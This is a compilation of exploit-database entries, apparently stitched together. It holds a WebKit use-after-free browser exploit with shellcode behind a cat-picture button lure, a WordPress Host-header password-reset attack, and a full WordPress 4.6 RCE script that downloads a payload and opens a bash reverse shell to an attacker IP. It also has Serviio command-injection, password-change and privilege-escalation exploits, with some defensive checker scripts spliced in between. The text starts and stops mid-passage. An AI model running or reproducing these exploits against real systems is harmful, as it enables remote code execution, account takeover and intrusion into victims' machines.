website's security by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website http://www.defensecode.com
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
Source: https://blogs.securiteam.com/index.php/archives/3171
Vulnerability Details
Jenkins is vulnerable to a Java deserialization vulnerability. Triggering it requires two requests to be sent.
The vulnerability lies in the implementation of a bidirectional communication channel (over HTTP) that accepts commands.
The first request starts a session for the bidirectional channel and is used for "downloading" data from the server. The HTTP header "Session" is the identifier for the channel. The HTTP header "Side" specifies the "download/upload" direction.
The second request is the sending component of the bidirectional channel. The first request is blocked until the second request is sent. The second request is matched to its channel by the "Session" HTTP header, which is just a UUID.
Proof of Concept
In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.
The second step is to edit the Python script jenkins_poc1.py:
- Adjust the target URL in the URL variable
- Change the file opened in the line FILE_SER = open("jenkins_poc1.ser", "rb").read() to your payload file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip
<!--
Sources:
https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf
https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html
Overview
The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS.
-->
<script>
function make_compiled_function() {
function target(x) {
return x*5 + x - x*x;
}
// Call only once so that function gets compiled with low level interpreter
// but none of the optimizing JITs
target(0);
return target;
}
function pwn() {
var haxs = new Array(0x100);
for (var i = 0; i < 0x100; ++i)
haxs[i] = new Uint8Array(0x100);
// hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100,
// which is the butterfly length if hax is later used as a butterfly for a
// fake JSArray.
var hax = haxs[0x80];
var hax2 = haxs[0x81];
var target_func = make_compiled_function();
// Small helper to avoid allocations with .set(), so we don't mess up the heap
function set(p, i, a,b,c,d,e,f,g,h) {
p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h;
}
function spray() {
var res = new Uint8Array(0x7ffff000);
for (var i = 0; i < 0x7ffff000; i += 0x1000) {
// Write heap pattern.
// We only need a structure pointer every 128 bytes, but also some of
// structure fields need to be != 0 and I can't remember which, so we just
// write pointers everywhere.
for (var j = 0; j < 0x1000; j += 8)
set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0);
// Write the offset to the beginning of each page so we know later
// with which part we overlap.
var j = i+1+2*8;
set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff);
}
return res;
}
// Spray ~14 GiB worth of array buffers with our pattern.
var x = [
spray(), spray(), spray(), spray(),
spray(), spray(), spray(), spray(),
];
// The butterfly of our fake object will point to 0x200000001. This will always
// be inside the second sprayed buffer.
var buf = x[1];
// A big array to hold reference to objects we don't want to be freed.
var ary = new Array(0x10000000);
var cnt = 0;
// Set up objects we need to trigger the bug.
var n = 0x40000;
var m = 10;
var regex = new RegExp("(ab)".repeat(n), "g");
var part = "ab".repeat(n);
var s = (part + "|").repeat(m);
// Set up some views to convert pointers to doubles
var convert = new ArrayBuffer(0x20);
var cu = new Uint8Array(convert);
var cf = new Float64Array(convert);
// Construct fake JSCell header
set(cu, 0,
0,0,0,0, // structure ID
8, // indexing type
0,0,0); // some more stuff we don't care about
var container = {
// Inline object with indexing type 8 and butterfly pointing to hax.
// Later we will refer to it as fakearray.
jsCellHeader: cf[0],
butterfly: hax,
};
while (1) {
// Try to trigger bug
s.replace(regex, function() {
for (var i = 1; i < arguments.length-2; ++i) {
if (typeof arguments[i] === 'string') {
// Root all the callback arguments to force GC at some point
ary[cnt++] = arguments[i];
continue;
}
var a = arguments[i];
// a.butterfly points to 0x200000001, which is always
// inside buf, but we are not sure what the exact
// offset is within it so we read a marker value.
var offset = a[2];
// Compute addrof(container) + 16. We write to the fake array, then
// read from a sprayed array buffer on the heap.
a[2] = container;
var addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + buf[offset + j];
// Add 16 to get address of inline object
addr += 16;
// Do the inverse to get fakeobj(addr)
for (var j = 0; j < 8; ++j) {
buf[offset + j] = addr & 0xff;
addr /= 0x100;
}
var fakearray = a[2];
// Re-write the vector pointer of hax to point to hax2.
fakearray[2] = hax2;
// At this point hax.vector points to hax2, so we can write
// the vector pointer of hax2 by writing to hax[16+{0..7}]
// Leak address of JSFunction
a[2] = target_func;
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + buf[offset + j];
// Follow a bunch of pointers to RWX location containing the
// function's compiled code
addr += 3*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
addr += 3*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
addr += 4*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
// Write shellcode
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
hax2[0] = 0xcc;
hax2[1] = 0xcc;
hax2[2] = 0xcc;
// Pwn.
target_func();
}
return "x";
});
}
}
</script>
<button onclick="pwn()">click here for cute cat picz!</button>
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================
Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
Wordpress will trigger the password reset function for the admin user account.
Because of the modified Host header, SERVER_NAME will be set to
a hostname of the attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
------[ resulting e-mail ]-----
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
-------------------------------
As we can see, the Return-Path, From, and Message-ID fields all have the attacker's
domain set.
The headers can be verified by replacing /usr/sbin/sendmail with the following
bash script:
#!/bin/bash
cat > /tmp/outgoing-email
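Once the sendmail stand-in above has captured a message, the symptom is a sender domain that does not match the site the reset link points to. The following checker is an added example, not part of the advisory: it parses a constructed copy of the e-mail shown above and lists the headers whose domain differs from the hostname in the body's reset URL. It detects the symptom only; the fix is to derive SERVER_NAME from a configured canonical hostname rather than from the request's Host header.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlsplit

# Constructed copy of the e-mail shown in the advisory, in the form the
# sendmail stand-in would leave in /tmp/outgoing-email.
CAPTURED_EMAIL = """\
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin
"""

# Constructed control case: the same mail as the site itself would send it.
CLEAN_EMAIL = CAPTURED_EMAIL.replace("attackers-mxserver.com", "companyX-wp")


def header_domains(raw):
    """Domain part of Return-Path, From and Message-ID, lower-cased."""
    msg = message_from_string(raw)
    domains = {}
    for name in ("Return-Path", "From"):
        addr = parseaddr(msg.get(name, ""))[1]
        domains[name] = addr.rpartition("@")[2].lower()
    message_id = (msg.get("Message-ID") or "").strip().strip("<>")
    domains["Message-ID"] = message_id.rpartition("@")[2].lower()
    return domains


def site_domain_from_body(raw):
    """The site's own hostname, taken from the first URL in the body (the
    reset link is built from the site URL, not from the Host header)."""
    body = message_from_string(raw).get_payload()
    match = re.search(r"https?://[^\s<>]+", body)
    return urlsplit(match.group(0)).hostname if match else None


def suspicious_headers(raw):
    """Headers whose domain is not the site's domain: non-empty means the
    Host header was reflected into the outgoing mail."""
    expected = site_domain_from_body(raw)
    return sorted(name for name, domain in header_domains(raw).items()
                  if domain and domain != expected)


if __name__ == "__main__":
    print(suspicious_headers(CAPTURED_EMAIL))  # ['From', 'Message-ID', 'Return-Path']
    print(suspicious_headers(CLEAN_EMAIL))     # []
```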
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------
rev_host="192.168.57.1"
function prep_host_header() {
cmd="$1"
rce_cmd="\${run{$cmd}}";
# replace / with ${substr{0}{1}{$spool_directory}}
#sed 's^/^${substr{0}{1}{$spool_directory}}^g'
rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
# replace ' ' (space) with
#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
#return "target(any -froot@localhost -be $rce_cmd null)"
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
#cat exploitbox.ans
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then
echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"
# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"
echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0
fi
echo "Exiting..."
exit 0
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows host is affected by
# an unauthenticated remote code execution vulnerability due to improper access control
# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
# calls cmd.exe to execute system commands. A remote attacker can exploit this with a
# simple JSON request, gaining system access with SYSTEM privileges via a specially
# crafted request and escape sequence.
#
# =================================================================================
# org/serviio/ui/resources/server/ActionsServerResource.java:
# -----------------------------------------------------------
#
# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
# this.validateParameters(representation, 2);
# try {
# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
# String url = StringUtils.trim(representation.getParameters().get(1));
# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
# DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
# return this.responseOk();
# }
# catch (InvalidMediaFormatException e) {
# return this.responseOk(603);
# }
#
# =================================================================================
# serviio.jar / external / ProcessExecutor.java:
# ----------------------------------------------
#
# private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
# HashMap<String, String> newEnv = new HashMap<String, String>();
# newEnv.putAll(System.getenv());
# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
# i18n[0] = new ProcessExecutorParameter("cmd");
# i18n[1] = new ProcessExecutorParameter("/C");
# for (int counter = 0; counter < this.commandArguments.length; ++counter) {
# ProcessExecutorParameter argument = this.commandArguments[counter];
# String envName = "JENV_" + counter;
# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
# if (!quotesNeededForWindows) {
# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
# }
# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
# }
# this.commandArguments = i18n;
# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
# newEnv.put("HOMEDRIVE", tempPath[0]);
# newEnv.put("HOMEPATH", tempPath[1]);
# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
# if (log.isTraceEnabled()) {
# log.trace(String.format("Env variables: %s", newEnv.toString()));
# }
# return newEnv;
# }
#
# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
# }
#
# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
# return quotesNeeded;
# }
#
# private String escapeAmpersandForWindows(String value) {
# return value.replaceAll("&", "^&");
# }
#
# =================================================================================
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Java/1.8.0_121
# Java/1.8.0_111
# Java/1.8.0_91
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5408
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
#
# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#
from urllib2 import Request, urlopen
import sys
if (len(sys.argv) <= 1):
print '[*] Usage: serviio_rce.py <ip address>'
exit(0)
host = sys.argv[1]
values = """
<action>
<name>checkStreamUrl</name>
<parameter>VIDEO</parameter>
<parameter>1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'</parameter>
</action>"""
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
response_body = urlopen(request).read()
print response_body
'''
Raw request:
POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close
{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
'''
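The decompiled ProcessExecutor code above only quotes an argument when it contains a space and only escapes "&", and checkStreamUrl() passes the URL parameter through unvalidated. The following validator is an added example, not Serviio's code: it applies an allow-list to the checkStreamUrl parameter (the accepted schemes are an assumption) and builds an argv list so the retriever can be launched without cmd /C at all, which is the real fix.

```python
import re
from urllib.parse import urlsplit

# Constructed: the second <parameter> value from the PoC above, as received.
POC_PARAMETER = "1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"

ALLOWED_SCHEMES = {"http", "https", "rtsp", "rtmp", "mms"}  # assumed
# Characters RFC 3986 allows in a URL; everything else is rejected outright.
URL_CHAR = re.compile(r"[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]")


def rejected_characters(value):
    """Characters that have no place in a URL (space, quotes, backtick, >)."""
    return sorted({c for c in value if not URL_CHAR.fullmatch(c)})


def is_safe_stream_url(value):
    """Allow-list validation for the checkStreamUrl parameter: only URL
    characters, an expected scheme and a plain hostname."""
    if not value or len(value) > 2048 or rejected_characters(value):
        return False
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname or ""
    return re.fullmatch(r"[A-Za-z0-9.-]+", host) is not None


def ffmpeg_argv(url, ffmpeg="ffmpeg"):
    """Argument vector for subprocess.run(argv, shell=False): no cmd /C, no
    %JENV_n% indirection, so quoting rules never apply. None if the URL is
    rejected; the caller should answer with an error, not run anything."""
    if not is_safe_stream_url(url):
        return None
    return [ffmpeg, "-i", url, "-f", "null", "-"]


if __name__ == "__main__":
    print(rejected_characters(POC_PARAMETER))   # [' ', '"', '>', '`']
    print(ffmpeg_argv(POC_PARAMETER))           # None
    print(ffmpeg_argv("http://10.0.0.5/live/stream.m3u8?token=abc%20def"))
```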
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an unauthenticated password modification vulnerability due to improper access
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
# via a specially crafted request, to change the login password for the mediabrowser protected
# page.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5407
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 3):
print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
exit(0)
host = sys.argv[1]
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
lozi = sys.argv[3]
values = """
<remoteAccess>
<remoteUserPassword>{0}</remoteUserPassword>
<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
<portMappingEnabled>true</portMappingEnabled>
<externalAddress>myserviio.dyndns.com</externalAddress>
</remoteAccess>"""
put = values.format(lozi)
headers = {
'Content-Type': 'application/xml',
'Accept': 'application/xml'
}
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
request.get_method = lambda: 'PUT'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for errorcode in roottree.iter('errorCode'):
print "\nReceived error code: "+errorcode.text
print 'Password successfully changed to: '+lozi
print 'Go to: http://'+host+':23424/mediabrowser\n'
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO
Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.
Desc: The application suffers from an unquoted search path issue affecting the Windows service
'Serviio', deployed as part of the Serviio DLNA server solution. This could potentially
allow an authorized but non-privileged local user to execute arbitrary code with elevated
privileges on the system. A successful attempt would require the local user to be able to
insert their code in the system root path undetected by the OS or other security applications,
where it could potentially be executed during application startup or reboot. If successful, the
local user's code would execute with the elevated privileges of the application.
Serviio also suffers from improper permissions, which allow a simple authenticated user
to replace the executable file with a binary of their choice. The vulnerability exists because
the 'Users' group is granted the 'F' (Full) flag on the Serviio directory and
its sub-directories.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5405
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
12.12.2016
---
C:\>sc qc Serviio
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Serviio
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Serviio
DEPENDENCIES : HTTP
SERVICE_START_NAME : LocalSystem
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>
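Both conditions above can be read off the sc qc and icacls output. The following audit routine is an added example, not part of the advisory: it parses constructed copies of the two outputs shown above, flags an unquoted image path that contains a space, and lists low-privilege principals with Full, Modify or Write rights on the service binary (the set of "low-privilege" principals is an assumption).

```python
import re

# Constructed copies of the two command outputs shown above.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Serviio
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\Serviio\\bin\\ServiioService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Serviio
        DEPENDENCIES       : HTTP
        SERVICE_START_NAME : LocalSystem
"""

ICACLS_OUTPUT = """\
C:\\Program Files\\Serviio\\bin\\ServiioService.exe BUILTIN\\Users:(I)(F)
                                                NT AUTHORITY\\SYSTEM:(I)(F)
                                                BUILTIN\\Administrators:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""

# Assumed list of principals that any local user is a member of.
LOW_PRIV_PRINCIPALS = ("BUILTIN\\Users", "Everyone",
                       "NT AUTHORITY\\Authenticated Users")


def parse_sc_qc(text):
    """'sc qc' output as a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        match = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if match:
            fields[match.group(1)] = match.group(2).strip()
    return fields


def unquoted_path_with_spaces(binary_path):
    """True when the image path is unquoted and contains a space before the
    executable name: the service control manager then tries each prefix."""
    path = binary_path.strip()
    if path.startswith('"'):
        return False
    match = re.match(r"(?i)(.*?\.exe)", path)   # image path ends at first .exe
    image = match.group(1) if match else path.split(" ")[0]
    return " " in image


def parse_icacls(text):
    """icacls output for one file as {principal: set(rights flags)}."""
    acl = {}
    for match in re.finditer(r"([A-Z ]+\\[A-Za-z0-9 ]+):((?:\([A-Z,]+\))+)", text):
        flags = re.findall(r"\(([A-Z,]+)\)", match.group(2))
        acl[match.group(1).strip()] = set(flags)
    return acl


def weak_principals(acl):
    """Low-privilege principals that may replace the binary (F, M or W)."""
    return sorted(p for p, flags in acl.items()
                  if p in LOW_PRIV_PRINCIPALS and flags & {"F", "M", "W"})


def audit_service(sc_text, icacls_text):
    """Findings for one service; an empty list means neither issue is present."""
    fields = parse_sc_qc(sc_text)
    findings = []
    path = fields.get("BINARY_PATH_NAME", "")
    if unquoted_path_with_spaces(path):
        findings.append("unquoted service path (runs as %s): %s"
                        % (fields.get("SERVICE_START_NAME", "?"), path))
    for principal in weak_principals(parse_icacls(icacls_text)):
        findings.append("service binary writable by " + principal)
    return findings


if __name__ == "__main__":
    for finding in audit_service(SC_QC_OUTPUT, ICACLS_OUTPUT):
        print(finding)
```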
#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 2):
print '[*] Usage: serviio_id.py <ip address> <port>'
